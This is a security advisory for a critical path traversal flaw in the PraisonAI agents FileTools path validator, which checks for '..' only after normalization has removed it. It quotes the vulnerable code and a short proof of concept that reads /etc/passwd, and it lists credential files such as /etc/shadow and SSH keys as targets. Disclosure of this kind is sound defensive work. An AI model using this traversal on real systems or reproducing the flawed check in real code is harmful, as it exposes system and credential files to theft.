PT-2026-30763 · Pypi · Praisonai

Published

2026-04-06

·

Updated

2026-04-06

·

CVE-2026-35615

CVSS v4.0

9.2

Critical

AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Executive Summary:

The path validation has a critical logic bug: it checks for .. AFTER normpath() has already collapsed all .. sequences. This makes the check completely useless and allows trivial path traversal to any file on the system. The path validation function also does not resolve the symlink wich could potentially cause path traversal.

Details:

validate path() calls os.path.normpath() first, which collapses .. sequences, then checks for '..' in normalized. Since .. is already collapsed, the check always passes.
Vulnerable File: src/praisonai-agents/praisonaiagents/tools/file tools.py
Lines: 42-49
class FileTools:
  """Tools for file operations including read, write, list, and information."""
  
  @staticmethod
  def validate path(filepath: str) -> str:
    # Normalize the path
    normalized = os.path.normpath(filepath)
    absolute = os.path.abspath(normalized)
    
    # Check for path traversal attempts (.. after normalization)
    # We check the original input for '..' to catch traversal attempts
    if '..' in normalized:
      raise ValueError(f"Path traversal detected: {filepath}")
    
    return absolute
Severity: CRITICAL
CVSS v3.1: 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Proof of concept (PoC)

Prerequisites:
  • Ability to specify a file path can call file operations
Steps to reproduce: poc.py
from praisonaiagents.tools.file tools import FileTools

print(FileTools. validate path('/tmp/../etc/passwd'))
# Returns: /etc/passwd

print(FileTools.read file('/tmp/../etc/passwd'))
# Returns: content of /etc/passwd
Why this works:
# Current vulnerable code:
normalized = os.path.normpath(filepath) # Collapses .. HERE
absolute = os.path.abspath(normalized)
if '..' in normalized: # Check AFTER collapse - ALWAYS FALSE!
  raise ValueError(...)

Impact:

  • Complete bypass of path traversal protection
  • Access to ANY file on the system with path from any starting directory
  • Read sensitive files: /etc/passwd, /etc/shadow, ~/.ssh/id rsa
  • Write arbitrary files if combined with write operations
  • Affect file operations read file, write file, list files, get file info, copy file, move file, delete file, download file

Additional Notes:

  • Fix: Check for '..' in filepath BEFORE calling normpath(), not after
  • validate path uses os.path.normpath and os.path.abspath, which don't resolve symlinks, making it vulnerable to path traversal via symlink if attacker can control the symlink.

Fix

Path traversal

Weakness Enumeration

Related Identifiers

CVE-2026-35615
GHSA-693F-PF34-72C5

Affected Products

Praisonai